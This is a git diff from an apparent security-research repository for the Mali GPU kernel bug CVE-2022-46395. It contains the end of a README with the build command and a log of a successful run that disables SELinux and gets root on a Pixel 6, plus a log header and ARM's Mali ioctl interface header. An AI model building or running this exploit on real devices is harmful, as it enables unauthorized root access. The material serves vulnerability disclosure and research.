Novmember 2022 and January 2023 patch. For reference, I used the following command to compile with clang in ndk-21: + +``` +android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf +``` + +The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race conditions hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rare crashes. If successful, it should disable SELinux and gain root. + +``` +oriole:/ $ /data/local/tmp/mali_user_buf +fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys +benchmark_time 357 +failed after 100 +failed after 200 +failed after 300 +benchmark_time 343 +failed after 400 +failed after 500 +failed after 600 +benchmark_time 337 +failed after 700 +failed after 800 +failed after 900 +benchmark_time 334 +failed after 1000 +failed after 1100 +failed after 1200 +benchmark_time 363 +failed after 1300 +finished reset: 190027720 fault: 135735849 772 err 0 read 3 +found pgd at page 4 +overwrite addr : 76f6100710 710 +overwrite addr : 76f5f00710 710 +overwrite addr : 76f6100710 710 +overwrite addr : 76f5f00710 710 +overwrite addr : 76f5d00710 710 +overwrite addr : 76f5b00710 710 +overwrite addr : 76f5d00710 710 +overwrite addr : 76f5b00710 710 +overwrite addr : 76f6100fd4 fd4 +overwrite addr : 76f5f00fd4 fd4 +overwrite addr : 76f6100fd4 fd4 +overwrite addr : 76f5f00fd4 fd4 +overwrite addr : 76f5d00fd4 fd4 +overwrite addr : 76f5b00fd4 fd4 +overwrite addr : 76f5d00fd4 fd4 +overwrite addr : 76f5b00fd4 fd4 +result 50 +oriole:/ # +``` diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h new file mode 100644 index 0000000..3b61e20 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali.h @@ -0,0 +1,1060 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_JM_IOCTL_H_ +#define _UAPI_KBASE_JM_IOCTL_H_ + +#include +#include + +/* + * 11.1: + * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags + * 11.2: + * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED, + * which some user-side clients prior to 11.2 might fault if they received + * them + * 11.3: + * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and + * KBASE_IOCTL_STICKY_RESOURCE_UNMAP + * 11.4: + * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET + * 11.5: + * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD) + * 11.6: + * - Added flags field to base_jit_alloc_info structure, which can be used to + * specify pseudo chunked tiler alignment for JIT allocations. + * 11.7: + * - Removed UMP support + * 11.8: + * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags + * 11.9: + * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY + * under base_mem_alloc_flags + * 11.10: + * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for + * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations + * with one softjob. + * 11.11: + * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags + * 11.12: + * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS + * 11.13: + * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT + * 11.14: + * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set + * under base_mem_alloc_flags + * 11.15: + * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags. + * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be + * passed to mmap(). + * 11.16: + * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf. + * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for + * dma-buf. Now, buffers are mapped on GPU when first imported, no longer + * requiring external resource or sticky resource tracking. UNLESS, + * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled. + * 11.17: + * - Added BASE_JD_REQ_JOB_SLOT. + * - Reused padding field in base_jd_atom_v2 to pass job slot number. + * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO + * 11.18: + * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags + * 11.19: + * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified. + * 11.20: + * - Added new phys_pages member to kbase_ioctl_mem_jit_init for + * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2 + * (replacing '_OLD') and _11_5 suffixes + * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in + * base_jd_atom_v2. It must currently be initialized to zero. + * - Added heap_info_gpu_addr to base_jit_alloc_info, and + * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's + * flags member. Previous variants of this structure are kept and given _10_2 + * and _11_5 suffixes. + * - The above changes are checked for safe values in usual builds + * 11.21: + * - v2.0 of mali_trace debugfs file, which now versions the file separately + * 11.22: + * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2. + * KBASE_IOCTL_JOB_SUBMIT supports both in parallel. + * 11.23: + * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify + * the physical memory backing of JIT allocations. This was not supposed + * to be a valid use case, but it was allowed by the previous implementation. + * 11.24: + * - Added a sysfs file 'serialize_jobs' inside a new sub-directory + * 'scheduling'. + * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. + */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + _IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. + */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. + */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. + * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. + * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; 